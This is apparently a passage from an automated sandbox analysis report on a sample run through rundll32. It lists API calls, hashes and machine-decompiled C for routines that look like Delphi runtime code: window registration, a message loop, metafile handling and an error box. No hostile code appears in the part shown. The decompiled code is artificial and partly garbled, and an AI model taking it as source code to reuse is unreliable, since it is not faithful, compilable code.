                          0x02830f7b

                          APIs
                          • GetClassInfoA.USER32(?,?,?), ref: 02830FF8
                          • UnregisterClassA.USER32(?,?), ref: 02831020
                          • RegisterClassA.USER32(?), ref: 02831036
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 02831072
                          • GetWindowLongA.USER32(00000000,000000F4), ref: 02831087
                          • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0283109A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ClassLongWindow$InfoRegisterUnregister
                          • String ID: @
                          • API String ID: 717780171-2766056989
                          • Opcode ID: 9da89e79fed5b119258288c49a0ca9a09ab97d0d6dab315fb246bc3b93eb2126
                          • Instruction ID: 881e4057c357cc21b2990ea06ba2f284613a5718724b148f512b67f63b729091
                          • Opcode Fuzzy Hash: 9da89e79fed5b119258288c49a0ca9a09ab97d0d6dab315fb246bc3b93eb2126
                          • Instruction Fuzzy Hash: CD51B878A003589BDB22DB68CC48B9E73FABF04704F504569E84DE7291DB34E949CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281E750 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetActiveWindow.USER32 ref: 0281E75F
                          • GetWindowRect.USER32(?,?), ref: 0281E7B9
                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0281E7EF
                          • MessageBoxA.USER32(?,?,?,?), ref: 0281E83A
                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0281E8AE,?,00000000,0281E8A7), ref: 0281E888
                          • SetActiveWindow.USER32(?,0281E8AE,?,00000000,0281E8A7), ref: 0281E899
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Active$MessageRect
                          • String ID: (
                          • API String ID: 3147912190-3887548279
                          • Opcode ID: cb610ca5194e1cac3c4206ab678661b0197a1560996e632733a554a678324cc8
                          • Instruction ID: 1d41a16d9eb4beb403a37953cd753292d3bc37abccbc9698d2122d367c7d938e
                          • Opcode Fuzzy Hash: cb610ca5194e1cac3c4206ab678661b0197a1560996e632733a554a678324cc8
                          • Instruction Fuzzy Hash: 684172BAE10208AFDB51DFE8D985FAEB7F9BB08700F544495E614EB291D774EA018F10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027FACB8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E027FACB8(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E027FAB54(__eax);
				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E027F962C( &_v38) != _v18) {
					E027F87DC();
				}
				_v12 = _v12 - 0x16;
				_v16 = E027D277C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x27fae27, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E027F87DC();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E027F87DC();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x27fae2e);
				return E027D279C(_v16);
			}


























                          0x027facb9
                          0x027facbb
                          0x027facc4
                          0x027facc7
                          0x027facca
                          0x027facce
                          0x027face0
                          0x027facea
                          0x027facfa
                          0x027facfa
                          0x027facff
                          0x027fad0b
                          0x027fad0e
                          0x027fad1c
                          0x027fad2a
                          0x027fad34
                          0x027fad3d
                          0x027fad3f
                          0x027fad3f
                          0x027fad5f
                          0x027fad7c
                          0x027fad7f
                          0x027fad88
                          0x027fad8d
                          0x027fad92
                          0x027fada8
                          0x027fadaa
                          0x027fadaf
                          0x027fadb1
                          0x027fadb1
                          0x027fadc3
                          0x027fadc8
                          0x027fadd2
                          0x027fadd8
                          0x027faddd
                          0x027fade4
                          0x027fadfc
                          0x027fadfe
                          0x027fae03
                          0x027fae05
                          0x027fae05
                          0x027fae0a
                          0x027fae10
                          0x027fae13
                          0x027fae16
                          0x027fae26

                          APIs
                          • MulDiv.KERNEL32(?,000009EC,00000000), ref: 027FAD5A
                          • MulDiv.KERNEL32(?,000009EC,00000000), ref: 027FAD77
                          • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 027FADA3
                          • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 027FADC3
                          • DeleteEnhMetaFile.GDI32(00000016), ref: 027FADE4
                          • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 027FADF7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FileMeta$Bits$DeleteHeader
                          • String ID: `
                          • API String ID: 1990453761-2679148245
                          • Opcode ID: d7169d68eef5a2718f412e712cccb04a99d0dc05f120a5255076bbfa807c02e7
                          • Instruction ID: 6b577abfbc8c02b2ba3892a74ad88c8f48ddbc89de456e767a332d5adbc9c304
                          • Opcode Fuzzy Hash: d7169d68eef5a2718f412e712cccb04a99d0dc05f120a5255076bbfa807c02e7
                          • Instruction Fuzzy Hash: CB41F7B5E04209AFDB51DFA8C884AAEB7F9EF48710F108069E948EB344E7359D41CF65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F4F04 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E027F4F04(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x28658bc != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L027D675C();
						}
						_t24 = 1;
					}
				} else {
					 *0x28658a0 = E027F4BD4(4, _t23,  *0x28658a0, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                          0x027f4f0d
                          0x027f4f10
                          0x027f4f1a
                          0x027f4f3f
                          0x027f4f47
                          0x027f4f67
                          0x027f4f6c
                          0x027f4f77
                          0x027f4f82
                          0x027f4f8c
                          0x027f4f8d
                          0x027f4f8e
                          0x027f4f8f
                          0x027f4f90
                          0x027f4f91
                          0x027f4f9b
                          0x027f4f9d
                          0x027f4fa5
                          0x027f4fa6
                          0x027f4fa6
                          0x027f4fab
                          0x027f4fab
                          0x027f4f1c
                          0x027f4f2e
                          0x027f4f3b
                          0x027f4f3b
                          0x027f4fb5

                          APIs
                          • GetMonitorInfoA.USER32(?,?), ref: 027F4F35
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 027F4F5C
                          • GetSystemMetrics.USER32(00000000), ref: 027F4F71
                          • GetSystemMetrics.USER32(00000001), ref: 027F4F7C
                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 027F4FA6
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                          • String ID: DISPLAY$GetMonitorInfo
                          • API String ID: 1539801207-1633989206
                          • Opcode ID: f4b51762568111993b97dfca8c332128a57216f438a6e81dbd40fea398e965db
                          • Instruction ID: 2c8a76e516d4eb9341b5769615b92155257635443eb929d42b83f7bd77da5880
                          • Opcode Fuzzy Hash: f4b51762568111993b97dfca8c332128a57216f438a6e81dbd40fea398e965db
                          • Instruction Fuzzy Hash: EB110036A083049FE760DF649848BA7B7EAFF06318F855929EF1987780D370A410CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D3F6C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E027D3F6C(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x286504c == 0) {
					if( *0x2863030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x2865220 == 0xd7b2 &&  *0x2865228 > 0) {
						 *0x2865238();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E027D3FF4, 2,  &_v4, 0);
				}
			}





                          0x027d3f74
                          0x027d3fd4
                          0x027d3fe4
                          0x027d3fe4
                          0x027d3fea
                          0x027d3f76
                          0x027d3f7f
                          0x027d3f8f
                          0x027d3f8f
                          0x027d3fab
                          0x027d3fcc
                          0x027d3fcc

                          APIs
                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,02862358,00000000,?,027D403A,?,?,02865638,?,?,028630BC,027D639D,02862358), ref: 027D3FA5
                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,02862358,00000000,?,027D403A,?,?,02865638,?,?,028630BC,027D639D,02862358), ref: 027D3FAB
                          • GetStdHandle.KERNEL32(000000F5,027D3FF4,00000002,02862358,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,02862358,00000000,?,027D403A,?,?,02865638), ref: 027D3FC0
                          • WriteFile.KERNEL32(00000000,000000F5,027D3FF4,00000002,02862358,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,02862358,00000000,?,027D403A,?,?), ref: 027D3FC6
                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 027D3FE4
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FileHandleWrite$Message
                          • String ID: Error$Runtime error at 00000000
                          • API String ID: 1570097196-2970929446
                          • Opcode ID: 210c586f3da3f1efcc31b6716cee4bdfe1e33d765271e2f8f5c56de408032f00
                          • Instruction ID: cdd8d9d6228aa2b114e01623d4c6a4c42800af39a683797eb9290d866154ec93
                          • Opcode Fuzzy Hash: 210c586f3da3f1efcc31b6716cee4bdfe1e33d765271e2f8f5c56de408032f00
                          • Instruction Fuzzy Hash: 65F06D6DE8438479FA21A2549C0EFAA26385706F14F944A94F269E81C5C7A890888E63
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02848330 Relevance: 12.2, APIs: 8, Instructions: 213windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 84%
                          			E02848330(intOrPtr* __eax, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v40;
				void* __ebx;
				void* __ebp;
				int _t85;
				signed int _t86;
				signed int _t99;
				signed int _t109;
				intOrPtr _t112;
				signed int _t127;
				signed int _t132;
				signed int _t141;
				intOrPtr* _t145;
				MSG* _t152;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr* _t181;
				signed int _t183;
				intOrPtr* _t184;
				intOrPtr* _t187;
				void* _t190;
				void* _t191;
				void* _t193;
				void* _t195;
				intOrPtr _t196;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t195;
				_t196 = _t195 + 0xffffffdc;
				_v8 = __eax;
				_t152 =  &_v40;
				_v12 = 0;
				if( *((char*)(_v8 + 0x296)) != 0) {
					L52:
					return _v12;
				} else {
					 *((intOrPtr*)( *_v8 + 0x16c))();
					_push(_t193);
					_push(0x2848612);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t196;
					do {
						if(PeekMessageA(_t152, 0, 0, 0, 1) == 0) {
							E02849184(_v8, _t152, _t152, _t190, _t191, __eflags);
							goto L50;
						} else {
							if(_t152->message != 0x7b) {
								L5:
								if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
									L7:
									if(E02847B20(_v8, _t152) == 0) {
										_t85 = _t152->message;
										__eflags = _t85 - 0x200;
										if(_t85 >= 0x200) {
											__eflags = _t85 - 0xb402;
											if(__eflags > 0) {
												_t86 = _t85 - 0xb403;
												__eflags = _t86;
												if(_t86 == 0) {
													 *((intOrPtr*)(_v8 + 0x2f4)) =  *((intOrPtr*)( *_v8 + 0x150))();
												} else {
													__eflags = _t86 == 1;
													if(_t86 == 1) {
														 *((intOrPtr*)(_v8 + 0x2f4)) =  *((intOrPtr*)( *_v8 + 0x154))();
													} else {
														goto L47;
													}
												}
											} else {
												if(__eflags == 0) {
													E028477C4(_v8, _t152->lParam);
												} else {
													_t99 = _t85 + 0xfffffe00 - 0xb;
													__eflags = _t99;
													if(_t99 < 0) {
														 *((intOrPtr*)( *_v8 + 0x178))();
													} else {
														__eflags = _t99 == 0xae16;
														if(_t99 == 0xae16) {
															goto L26;
														} else {
															goto L47;
														}
													}
												}
											}
											goto L48;
										} else {
											__eflags = _t85 - 0xa4;
											if(__eflags > 0) {
												_t109 = _t85 - 0xa7;
												__eflags = _t109;
												if(_t109 == 0) {
													goto L26;
												} else {
													__eflags = _t109 + 0xffffffa7 - 9;
													if(_t109 + 0xffffffa7 - 9 < 0) {
														__eflags = _t152->wParam - 0x70;
														if(_t152->wParam != 0x70) {
															L37:
															_t112 = _v8;
															__eflags =  *((char*)(_t112 + 0x248));
															if( *((char*)(_t112 + 0x248)) == 0) {
																 *((intOrPtr*)( *_v8 + 0x138))();
															}
															__eflags = _t152->message - 0x104;
															if(_t152->message != 0x104) {
																L42:
																 *((intOrPtr*)( *((intOrPtr*)(E02846B54( *((intOrPtr*)(_v8 + 0x2b0))))) - 0x14))();
															} else {
																__eflags = _t152->wParam - 0x12;
																if(_t152->wParam != 0x12) {
																	goto L42;
																} else {
																	 *((intOrPtr*)( *_v8 + 0x17c))();
																	 *((char*)(_v8 + 0x28a)) = 1;
																	TranslateMessage(_t152);
																	DispatchMessageA(_t152);
																}
															}
															goto L48;
														} else {
															_t127 = E02847FC4(E02846B54( *((intOrPtr*)(_v8 + 0x2b0))));
															__eflags = _t127;
															if(_t127 == 0) {
																goto L37;
															} else {
																_t132 =  *(E02847FC4(E02846B54( *((intOrPtr*)(_v8 + 0x2b0)))) + 0x64);
																_t181 =  *0x2864774; // 0x2865b5c
																_t27 =  *_t181 + 0x6c; // 0x0
																_t183 =  *_t27;
																__eflags = _t183;
																if(_t183 != 0) {
																	__eflags = _t132;
																	if(_t132 == 0) {
																		_t132 =  *(_t183 + 0x158);
																	}
																	__eflags =  *(_t183 + 0x228) & 0x00000008;
																	if(( *(_t183 + 0x228) & 0x00000008) == 0) {
																		_t184 =  *0x28645d4; // 0x2865b58
																		E0281EBC0( *_t184, _t152, _t132);
																	} else {
																		_t187 =  *0x28645d4; // 0x2865b58
																		E0281EC38( *_t187, _t132, 8);
																	}
																	E027D3B48();
																} else {
																	E027D3B48();
																}
																goto L52;
															}
														}
													} else {
														goto L47;
													}
												}
											} else {
												if(__eflags == 0) {
													L26:
													 *((intOrPtr*)( *_v8 + 0x17c))();
													E0284934C( *((intOrPtr*)(_v8 + 0x2c4)));
													DispatchMessageA(_t152);
												} else {
													_t141 = _t85 - 0x10;
													__eflags = _t141;
													if(_t141 == 0) {
														goto L26;
													} else {
														__eflags = _t141 == 0x91;
														if(_t141 == 0x91) {
															goto L26;
														} else {
															L47:
															TranslateMessage(_t152);
															DispatchMessageA(_t152);
														}
													}
												}
												L48:
												E0284735C(_v8);
												goto L50;
											}
										}
									} else {
										TranslateMessage(_t152);
										DispatchMessageA(_t152);
										goto L50;
									}
								} else {
									_t145 =  *0x28645d4; // 0x2865b58
									if(E0281E2A4( *_t145, _t152) != 0) {
										goto L50;
									} else {
										goto L7;
									}
								}
							} else {
								_t170 =  *0x2845dfc; // 0x2845e48
								if(E027D3398( *((intOrPtr*)(_v8 + 0x2c4)), _t170) != 0) {
									goto L50;
								} else {
									goto L5;
								}
							}
						}
						goto L53;
						L50:
					} while ( *((char*)(_v8 + 0x296)) != 0);
					_pop(_t171);
					 *[fs:eax] = _t171;
					return  *((intOrPtr*)( *_v8 + 0x158))(0x2848619);
				}
				L53:
			}





























                          0x02848330
                          0x02848330
                          0x02848331
                          0x02848333
                          0x02848337
                          0x0284833a
                          0x0284833f
                          0x0284834c
                          0x02848619
                          0x02848620
                          0x02848352
                          0x02848357
                          0x0284835f
                          0x02848360
                          0x02848365
                          0x02848368
                          0x0284836b
                          0x0284837b
                          0x028485e4
                          0x00000000
                          0x02848381
                          0x02848385
                          0x028483a3
                          0x028483aa
                          0x028483c2
                          0x028483ce
                          0x028483e1
                          0x028483e4
                          0x028483e9
                          0x02848419
                          0x0284841e
                          0x02848440
                          0x02848440
                          0x02848445
                          0x028485c1
                          0x0284844b
                          0x0284844b
                          0x0284844c
                          0x028485a8
                          0x02848452
                          0x00000000
                          0x02848452
                          0x0284844c
                          0x02848420
                          0x02848420
                          0x02848590
                          0x02848426
                          0x0284842b
                          0x0284842b
                          0x0284842e
                          0x02848582
                          0x02848434
                          0x02848434
                          0x02848439
                          0x00000000
                          0x0284843b
                          0x00000000
                          0x0284843b
                          0x02848439
                          0x0284842e
                          0x02848420
                          0x00000000
                          0x028483eb
                          0x028483eb
                          0x028483f0
                          0x02848405
                          0x02848405
                          0x0284840a
                          0x00000000
                          0x0284840c
                          0x0284840f
                          0x02848412
                          0x0284847b
                          0x0284847f
                          0x02848518
                          0x02848518
                          0x0284851b
                          0x02848522
                          0x0284852b
                          0x0284852b
                          0x02848531
                          0x02848538
                          0x02848563
                          0x02848576
                          0x0284853a
                          0x0284853a
                          0x0284853e
                          0x00000000
                          0x02848540
                          0x02848545
                          0x0284854e
                          0x02848556
                          0x0284855c
                          0x0284855c
                          0x0284853e
                          0x00000000
                          0x02848485
                          0x02848493
                          0x02848498
                          0x0284849a
                          0x00000000
                          0x0284849c
                          0x028484af
                          0x028484b2
                          0x028484ba
                          0x028484ba
                          0x028484bd
                          0x028484bf
                          0x028484cb
                          0x028484cd
                          0x028484d4
                          0x028484d4
                          0x028484e0
                          0x028484e7
                          0x02848500
                          0x02848509
                          0x028484e9
                          0x028484e9
                          0x028484f9
                          0x028484f9
                          0x0284850e
                          0x028484c1
                          0x028484c1
                          0x028484c1
                          0x00000000
                          0x028484bf
                          0x0284849a
                          0x02848414
                          0x00000000
                          0x02848414
                          0x02848412
                          0x028483f2
                          0x028483f2
                          0x02848457
                          0x0284845c
                          0x0284846b
                          0x02848471
                          0x028483f4
                          0x028483f4
                          0x028483f4
                          0x028483f7
                          0x00000000
                          0x028483f9
                          0x028483f9
                          0x028483fe
                          0x00000000
                          0x02848400
                          0x028485c9
                          0x028485ca
                          0x028485d0
                          0x028485d0
                          0x028483fe
                          0x028483f7
                          0x028485d5
                          0x028485d8
                          0x00000000
                          0x028485d8
                          0x028483f0
                          0x028483d0
                          0x028483d1
                          0x028483d7
                          0x00000000
                          0x028483d7
                          0x028483ac
                          0x028483ae
                          0x028483bc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x028483bc
                          0x02848387
                          0x02848390
                          0x0284839d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0284839d
                          0x02848385
                          0x00000000
                          0x028485e9
                          0x028485ec
                          0x028485fb
                          0x028485fe
                          0x02848611
                          0x02848611
                          0x00000000

                          APIs
                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 02848374
                          • TranslateMessage.USER32(?), ref: 028483D1
                          • DispatchMessageA.USER32(?), ref: 028483D7
                          • DispatchMessageA.USER32(?), ref: 02848471
                          • TranslateMessage.USER32(?), ref: 028485CA
                          • DispatchMessageA.USER32(?), ref: 028485D0
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Message$Dispatch$Translate$Peek
                          • String ID:
                          • API String ID: 1308778987-0
                          • Opcode ID: 1d5e9bfeeaedc075ee8cc3e9b1f4ed8a5e8b35fe6ddbedcca62e97f9b9f9065d
                          • Instruction ID: 56390d4a960285c62c2c1575c4aab564f9839f2c8a36c6c3a514c811bb3b0229
                          • Opcode Fuzzy Hash: 1d5e9bfeeaedc075ee8cc3e9b1f4ed8a5e8b35fe6ddbedcca62e97f9b9f9065d
                          • Instruction Fuzzy Hash: 9F812A3C604109DFDB11EF68C988AAEB7F6AF45308F6585A5E809DB296CF30DE41DB41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02820A7C Relevance: 12.2, APIs: 8, Instructions: 170windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 55%
                          			E02820A7C(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
				intOrPtr _v8;
				struct HDC__* _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				int _t85;
				void* _t119;
				void* _t120;
				void* _t129;
				struct HDC__* _t138;
				struct HDC__* _t139;
				int _t140;
				void* _t141;

				_t121 = __ecx;
				_t137 = __ecx;
				_v8 = __edx;
				_t120 = __eax;
				_t46 = E028201D8(__eax);
				if(_t46 != 0) {
					_t144 = _a4;
					if(_a4 == 0) {
						__eflags =  *(_t120 + 0x54);
						if( *(_t120 + 0x54) == 0) {
							_t140 = E027FC2CC(1);
							 *(_t120 + 0x54) = _t140;
							E027FD6F0(_t140, 1);
							 *((intOrPtr*)( *_t140 + 0x40))();
							_t121 =  *_t140;
							 *((intOrPtr*)( *_t140 + 0x34))();
						}
						E027F7CA4( *((intOrPtr*)(E027FC894( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
						E027E9BA4(0,  *(_t120 + 0x34), 0,  &_v44,  *(_t120 + 0x30));
						_push( &_v44);
						_t57 = E027FC894( *(_t120 + 0x54));
						_pop(_t129);
						E027F80D8(_t57, _t129);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E027F84EC(E027FC894( *(_t120 + 0x54))));
						_push(_v8);
						_push(E028203AC(_t120));
						L027FEF0C();
						E027E9BA4(_a16, _a16 +  *(_t120 + 0x34), _a12,  &_v28, _a12 +  *(_t120 + 0x30));
						_v12 = E027F84EC(E027FC894( *(_t120 + 0x54)));
						E027F7CA4( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000014, _t137, _t141, __eflags);
						_t138 = E027F84EC(_t137);
						SetTextColor(_t138, 0xffffff);
						SetBkColor(_t138, 0);
						_t85 = _a16 + 1;
						__eflags = _t85;
						BitBlt(_t138, _t85, _a12 + 1,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
						E027F7CA4( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000010, _t137, _t141, _t85);
						_t139 = E027F84EC(_t137);
						SetTextColor(_t139, 0xffffff);
						SetBkColor(_t139, 0);
						return BitBlt(_t139, _a16, _a12,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
					}
					_push(_a8);
					_push(E0281FFD4(_t144));
					E02820A54(_t120, _t144);
					_push(E0281FFD4(_t144));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E027F84EC(__ecx));
					_push(_v8);
					_t119 = E028203AC(_t120);
					_push(_t119);
					L027FEF0C();
					return _t119;
				}
				return _t46;
			}



















                          0x02820a7c
                          0x02820a85
                          0x02820a87
                          0x02820a8a
                          0x02820a8e
                          0x02820a95
                          0x02820a9b
                          0x02820a9f
                          0x02820ae5
                          0x02820ae9
                          0x02820af7
                          0x02820af9
                          0x02820b00
                          0x02820b0c
                          0x02820b14
                          0x02820b16
                          0x02820b16
                          0x02820b29
                          0x02820b3d
                          0x02820b45
                          0x02820b49
                          0x02820b4e
                          0x02820b4f
                          0x02820b54
                          0x02820b56
                          0x02820b58
                          0x02820b5a
                          0x02820b5c
                          0x02820b5e
                          0x02820b60
                          0x02820b6f
                          0x02820b73
                          0x02820b7b
                          0x02820b7c
                          0x02820b98
                          0x02820baa
                          0x02820bb5
                          0x02820bc1
                          0x02820bc9
                          0x02820bd1
                          0x02820bf3
                          0x02820bf3
                          0x02820bf6
                          0x02820c03
                          0x02820c0f
                          0x02820c17
                          0x02820c1f
                          0x00000000
                          0x02820c42
                          0x02820aa4
                          0x02820aad
